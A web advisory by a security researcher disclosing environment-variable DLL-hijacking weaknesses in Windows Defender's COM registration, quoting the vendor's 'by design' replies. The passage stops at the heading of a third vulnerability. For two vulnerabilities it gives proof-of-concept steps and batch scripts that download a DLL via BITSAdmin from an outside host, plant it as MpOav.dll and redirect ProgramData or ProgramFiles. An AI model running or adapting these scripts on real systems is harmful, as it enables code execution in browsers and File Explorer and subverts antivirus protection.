Me, myself & IT

Vulnerabilities Introduced by Windows^™ Defender

Purpose
Reason
Vulnerability 1: Demonstration; Batch Script; Vendor Statement
Vulnerability 2: Demonstration; Batch Script; Vendor Statement
Background Information
Vulnerability 3: Demonstration; Batch Script
Vulnerability 4: Demonstration; Batch Script; Vendor Statement
Vulnerability 5
Mitigation

Purpose

Demonstrate vulnerabilities introduced by Windows Defender and the anti-malware interfaces of Microsoft^® Windows NT.
Also show that the tamper protection announced in the MSKB articles 2769299 and 4490103, which is described in more detail by Protect security settings with tamper protection, is a bad joke, while its documentation tells a blatant lie:

With tamper protection, malicious apps are prevented from taking actions like these:

Disabling virus and threat protection

Disabling real-time protection

Turning off behavior monitoring

Disabling antivirus (such as IOfficeAntivirus (IOAV))

Disabling cloud-delivered protection

Removing security intelligence updates

Reason

Windows Defender and the anti-malware interfaces implemented in Windows, like almost all so-called security software, don’t increase the safety and security of the operating system, but decrease it instead, and allow to launch attacks in the first place!

As shown hereafter, it is not even able to protect itself, despite the highlighted claim from its documentation cited above.

Vulnerability 1

In September 2017, Microsoft published the update 4052623 for Windows 10 which relocates many executable files of Windows Defender from the directories %ProgramFiles%\Windows Defender\ and %ProgramFiles(x86)%\Windows Defender\ to %ProgramData%\Microsoft\Windows Defender\platform\‹version›\, violating the minimum requirements of their own, almost 30 (in words: thirty) years old Designed for Windows specification.

Note: I wish that somebody working for Microsoft would be able to understand English language and teach developers the difference between program files and (program) data as well as (application) data!

Ever since this braindead move, the pathnames registered for the COM classes provided by Windows Defender reference the environment variable ProgramData:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}]
@="Defender CSP"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\DefenderCSP.dll\""
"ThreadingModel"="Free"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\MpOav.dll\""
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}]
@="Windows Defender WMI Provider"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\ProtectionManagement.dll\""
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

Note: the double quotes around the DLL pathnames are superfluous and thus yet another indication of Microsoft’s sloppy development process as well as the lack of thorough quality assurance and supervision!

Of special interest here is the implementation of the IOfficeAntiVirus COM interface, documented in the MSKB article Microsoft Windows Defender helps provide real-time protection; introduced with Windows 2000 and Internet Explorer 5, it is called (for example) by the Attachment Manager introduced with Windows XP SP2 and Internet Explorer 6 SP2.

The Attachment Manager is in turn called by WWW browsers, mail and news clients, instant messengers, etc. after they store a downloaded file, a WWW page, an email or an attachment, and by File Explorer when such a file is to be opened or executed.
In the first case the Attachment Manager adds the Mark of the Web, an NTFS Alternate Data Stream named Zone.Identifier containing the text [ZoneTransfer]\r\nZoneId=‹integer›\r\n to the saved file; in the second case it evaluates the Mark of the Web.

Thanks to the (user-controlled) environment variable ProgramData specified in the registered pathname "%ProgramData%\Microsoft\Windows Defender\platform\‹version›\MpOav.dll" an (unprivileged) attacker can provide an arbitrary (rogue or malicious) DLL which is then loaded and executed by WWW browsers, mail and news clients, instant messengers and File Explorer whenever the user stores or opens a downloaded file, a WWW page or an attachment.

Note: this well-known weakness is documented as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE^™, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC^™.

Demonstration

On a 32-bit (I386 alias x86) or 64-bit (AMD64 alias x64) installation of Windows 10 with the anti-malware platform update 4052623 installed perform the following 10 (plus 1) simple steps.

Log on to an arbitrary (unprivileged) user account and start the Command Processor %SystemRoot%\System32\Cmd.exe alias %ComSpec%.

Verify that the tamper protection is enabled and the IOAV protection is not disabled:

REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
    TamperProtection    REG_DWORD    0x1

ERROR: The specified registry key or value was not found.

ERROR: The specified registry key or value was not found.

Download the cabinet archive SENTINEL.CAB as well as the portable executable image file SENTINEL.EXE of the Vulnerability and Exploit Detector and save them in your Downloads directory %USERPROFILE\Downloads\:
```
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
START https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
```
Note: the downloaded files get the Mark of the Web!

Extract the SENTINEL.DLL for both processor architectures (32-bit: I386; 64-bit: AMD64) into your Temp directory %TMP%\:

EXPAND.EXE "%USERPROFILE%\Downloads\SENTINEL.CAB" /F:* "%TMP%"

Microsoft (R) File Expansion Utility  Version 10.0.11001.16384
Copyright (C) Microsoft Corporation. All rights reserved.

Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue

Expanding Files ....

Expanding Files Complete ...
7 files total.

Determine the registered pathname of MPOAV.DLL:

REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32" /VE

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32
    (Default)    REG_EXPAND_SZ    "%ProgramData%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"

Choose an arbitrary directory where you can create subdirectories, for example your user profile %USERPROFILE%\, the root directory of Windows’ system drive %SystemDrive%\, the system’s Temp directory %SystemRoot%\Temp\, or even a (remote) network share like %LOGONSERVER%\Users\Public\, then create the subdirectories Microsoft\, Windows Defender\, Platform\ and ‹version›\ displayed in the previous step 5. beyond it:
```
MKDIR "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0"
```
Copy the SENTINEL.DLL that matches the bitness of your system as MPOAV.DLL into the directory ‹version› created in the previous step 6.:
```
COPY "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
```
on 32-bit (I386 alias x86) installations, and
```
COPY "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
```
on 64-bit (AMD64 alias x64) installations!

Verify that you copied the appropriate SENTINEL.DLL and check its proper function:

MSIEXEC.EXE /Z "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"

Set the environment variable ProgramData to the pathname of the directory used in step 6.:
```
SET ProgramData=%SystemDrive%
SETX.EXE ProgramData %SystemDrive%
```
Start every WWW browser available with the same bitness as your system, then download an arbitrary file and notice the message box displayed by the (rogue) %SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll called from the WWW browser and running unrestricted:
```
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
START IEXPLORE https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
"%ProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
…
```
Start the portable executable image file SENTINEL.EXE downloaded in step 3. (which got the Mark of the Web) and again notice the message box displayed by the (rogue) %SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll now called from File Explorer:
```
START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
```

Batch Script

The following batch script performs all the above steps on 32-bit and 64-bit installations of Windows 10 with the anti-malware platform update 4052623 installed:

Rem Copyright © 2018-2024, Stefan Kanthak <stefan‍.‍kanthak‍@‍nexgo‍.‍de>

If Not Defined ProgramData Exit /B
If Not Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B

SetLocal EnableDelayedExpansion EnableExtensions
For /F "Delims== Tokens=2" %%? In ('Assoc "CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32"') Do Set OFFENDER=%%~?
If /I Not "%OFFENDER:~0,50%" == "%%ProgramData%%\Microsoft\Windows Defender\Platform\" Exit /B
If /I Not "%OFFENDER:~-10%" == "\MPOAV.dll" Exit /B
Set OFFENDER=!OFFENDER:%%ProgramData%%=%SystemDrive%!
If Exist "%OFFENDER%" Exit /B

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B

"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B

MkDir "%OFFENDER:~0,-10%"
If Defined ProgramFiles(x86) Copy "%TMP%\AMD64\SENTINEL.DLL" "%OFFENDER%"
If Not Defined ProgramFiles(x86) Copy "%TMP%\I386\SENTINEL.DLL" "%OFFENDER%"
Set ProgramData=%SystemDrive%
"%SystemRoot%\System32\SetX.exe" ProgramData "%SystemDrive%"

Start https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
Start IEXPLORE https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
Exit /B

Vendor Statement

The MSRC assigned case number 57439 to the above vulnerability report and replied with the following statements:

After investigation, our engineers have determine this this behavior is by-design and does not constitute as a vulnerability as reported.

OUCH¹: please teach these engineers the difference between a pathname registered as %ProgramData%\…\‹filename›.‹extension› and a pathname registered as C:\ProgramData\…\‹filename›.‹extension›!

Hint: the latter does not allow to load and execute an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!

The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.

For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.
Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.

OUCH²: the attack surface for the current scenario is but provided by Windows Defender due to its poor implementation (see above) which allows this attack in the first place.

There is also no utility process started here: the attacker controlled DLL is loaded and executed in the processes which want to call AV, instead of the DLL installed with Windows Defender, preventing exactly the intended execution of the AV’s utility process and defeating your design!

Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.

OUCH³: there is neither an utility process nor a decoupled process involved!

The demonstration runs an arbitrary (rogue or malicious) DLL in the process of a WWW browser, a mail and news client, an instant messenger as well as the shell alias File Explorer, with the credentials of the current user, unrestricted.

As such, we are closing this case.

That said, I conclude you are neither interested in trustworthy computing nor the safety and security of your customers – I recommend to have yourselves, your developers, your engineers and of course your obviously incompetent managers take a look at your governments Cybersecurity & Infrastructure Security Agency’s Secure by Design initiative and the underlying principle!

Vulnerability 2

Microsoft still registers lots of DLLs (which implement COM classes, cryptography service providers, services, etc.) as well as command lines with paths containing the (pre-defined) environment variables windir, SystemRoot, ProgramFiles, CommonProgramFiles, ProgramFiles(x86) and CommonProgramFiles(x86).

Windows Defender, as shipped with Windows Vista^® and newer versions of Windows^™ NT, installs a COM class which implements the IOfficeAntiVirus COM interface:

REGEDIT4

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]

[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"%ProgramFiles%\\Windows Defender\\MpOav.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]

This COM interface is (for example) called by the Attachment Manager, which is in turn called by WWW browsers, mail and news clients, instant messengers, etc. after they store a downloaded file, a WWW page or an attachment, and by File Explorer when such a file (which carries the Mark of the Web) is to be opened or executed.

Since (user) environment variables set in a user’s profile obscur (system) environment variables with the same name set for the machine, (unprivileged) users can redirect all those paths containing environment variables and execute arbitrary (rogue or malicious) DLLs and programs instead of the intended DLLs and programs!

Note: the resulting well-known weakness is documented as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE^™, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC^™.

Note: Microsoft Security Essentials Microsoft Security Essentials Microsoft Security Essentials, Microsoft Security Essentials Update available for Windows XP, Windows Vista and Windows 7, does not suffer from this vulnerability!

Demonstration

On a 32-bit (I386 alias x86) or 64-bit (AMD64 alias x64) installation of Windows Vista or any newer version of Windows, except Windows 10 with the anti-malware platform update 4052623 installed, perform the following 11 (plus 1) simple steps.

Log on to an arbitrary (unprivileged) user account and start the Command Processor %SystemRoot%\System32\Cmd.exe alias %ComSpec%.

Verify that the tamper protection is enabled and the IOAV protection is not disabled:

REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
    TamperProtection    REG_DWORD    0x1

ERROR: The specified registry key or value was not found.

ERROR: The specified registry key or value was not found.

Create a directory Rogue Program Files\ in the root directory of Windows’ system drive, copy the directory %ProgramFiles%\Windows Defender\ with its contents into the empty new directory, then create junction reparse points to all other subdirectories of the %ProgramFiles%\ directory inside the new directory:

MKDIR "%SystemDrive%\Rogue Program Files"
XCOPY.EXE "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
FOR /D %? IN ("%ProgramFiles%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files\%~nx?" "%~?"

C:\Program Files\Windows Defender\MpAsDesc.dll
C:\Program Files\Windows Defender\MpClient.dll
C:\Program Files\Windows Defender\MpCmdRun.exe
C:\Program Files\Windows Defender\MpCommu.dll
C:\Program Files\Windows Defender\MpEvMsg.dll
C:\Program Files\Windows Defender\MpOAV.dll
C:\Program Files\Windows Defender\MpRTP.dll
C:\Program Files\Windows Defender\MpSvc.dll
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Windows Defender\MsMpCom.dll
C:\Program Files\Windows Defender\MsMpLics.dll
C:\Program Files\Windows Defender\MsMpRes.dll
C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui
C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui
C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui
15 File(s) copied

Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\…
…
Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\…

On 64-bit installations, additionally create a directory Rogue Program Files (x86)\ in the root directory of Windows’ system drive, copy the directory %ProgramFiles(x86)%\Windows Defender\ with its contents into the empty new directory, then create junction reparse points to all other subdirectories of the %ProgramFiles(x86)%\ directory inside the new directory:

MKDIR "%SystemDrive%\Rogue Program Files (x86)"
XCOPY.EXE "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
FOR /D %? IN ("%ProgramFiles(x86)%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files (x86)\%~nx?" "%~?"

C:\Program Files (x86)\Windows Defender\MpAsDesc.dll
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui
C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui
6 File(s) copied

Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\…
…
Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\…

Download the cabinet archive SENTINEL.CAB as well as the portable executable image file SENTINEL.EXE of the Vulnerability and Exploit Detector and save them in your Downloads directory %USERPROFILE%\Downloads\:
```
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
START https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
```
Note: the downloaded files get the Mark of the Web!

Extract the SENTINEL.DLL for both processor architectures (32-bit: I386; 64-bit: AMD64) into your Temp directory %TMP%\:

EXPAND.EXE "%TMP%\SENTINEL.CAB" /F:* "%TMP%"

Microsoft (R) File Expansion Utility  Version 6.1.7600.16385
Copyright (C) Microsoft Corporation. All rights reserved.

Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue

Expanding Files ....

Expanding Files Complete ...
7 files total.

On 32-bit installations, copy the 32-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll:
```
COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll"
```
On 64-bit installations, copy the 64-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll and the 32-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll:
```
COPY /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll"
COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll"
```

Save the value of the environment variable ProgramFiles, then set it to the pathname of the directory created in step 3.:

SET RealProgramFiles=%ProgramFiles%
SET ProgramFiles=%SystemDrive%\Rogue Program Files
SETX.EXE ProgramFiles "%SystemDrive%\Rogue Program Files"

On 64-bit installations, additionally save the value of the environment variable ProgramFiles(x86), then set it to the pathname of the directory created in step 4.:
```
SET RealProgramFiles(x86)=%ProgramFiles(x86)%
SET ProgramFiles(x86)=%SystemDrive%\Rogue Program Files
SETX.EXE ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"
```
Download an arbitrary file with your WWW browser, for example SENTINEL.DLL, or save an attachment in your mail client:
```
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
"%RealProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
"%RealProgramFiles(x86)%\Internet Explorer\IEXPLORE.EXE" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
```
This loads and executes %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll and %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll which display message boxes with informations about their caller, instead of C:\Program Files\Windows Defender\MpOAV.dll and C:\Program Files (x86)\Windows Defender\MpOAV.dll!
Start the portable executable image file SENTINEL.EXE downloaded in step 5. (which got the Mark of the Web) and again notice the message box displayed by %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll or %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll now called from File Explorer:
```
START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
```

Batch Script

The following batch script performs all the above steps on 32-bit and 64-bit installations of Windows Vista and newer versions of Windows:

Rem Copyright © 2009-2024, Stefan Kanthak <stefan‍.‍kanthak‍@‍nexgo‍.‍de>

Rem (KB4052623)
Rem If Defined ProgramData If Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B

"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B

If Not Defined ProgramFiles Exit /B
If Not Exist "%ProgramFiles%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files" Exit /B

MkDir "%SystemDrive%\Rogue Program Files"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files\%%~nx?" "%%?"
Set RealProgramFiles=%ProgramFiles%
Set ProgramFiles=%SystemDrive%\Rogue Program Files
"%SystemRoot%\System32\SetX.exe" ProgramFiles "%SystemDrive%\Rogue Program Files"

Start https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
"%RealProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.DLL

If Not Defined ProgramFiles(x86) Exit /B
If Not Exist "%ProgramFiles(x86)%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files (x86)" Exit /B

MkDir "%SystemDrive%\Rogue Program Files (x86)"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
Copy /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles(x86)%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files (x86)\%%~nx?" "%%?"
Set RealProgramFiles(x86)=%ProgramFiles(x86)%
Set ProgramFiles(x86)=%SystemDrive%\Rogue Program Files
"%SystemRoot%\System32\SetX.exe" ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"

"%RealProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
Exit /B

Vendor Statement

The MSRC assigned case number 57447 to the above vulnerability report and replied with the following statements:

This was also assessed a similar was as they other reported case.
After investigation, our engineers have determine this this behavior is by-design and does not constitute as a vulnerability as reported.

OUCH¹: please teach these engineers the difference between a pathname registered as %ProgramFiles%\…\‹filename›.‹extension› and a pathname registered as C:\Program Files\…\‹filename›.‹extension›!

Hint: the latter does not allow to load and execute an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!

The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.

For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.
Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.

OUCH²: the attack surface for the current scenario is but provided by Windows Defender due to its poor implementation (see above) which allows this attack in the first place.

Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.

OUCH³: there is neither an utility process nor a decoupled process involved!

As such, we are closing this case.

Background Information

Windows Vista and newer versions of Windows are shipped as (pre-built) generalised system images, designed to run from a single hard disk partition with the drive letter C assigned. All directories and files contained within these system images have fixed, language-independent (path)names and can neither be relocated nor renamed: see the MSKB articles 949977 and 2787623 for some details. Additionally the vast majority of files are (nowadays) registered with their absolute (fully qualified) pathname containing the (fixed) drive letter and the language-independent directory name, which renders their change or relocation practically impossible.

The use of environment variables within pathnames serves no (good) purpose, it is not just deprecated and superfluous, but outright dangerous, allowing attacks like those shown above in the first place, and must therefore be avoided and banned!

Vulnerability 3

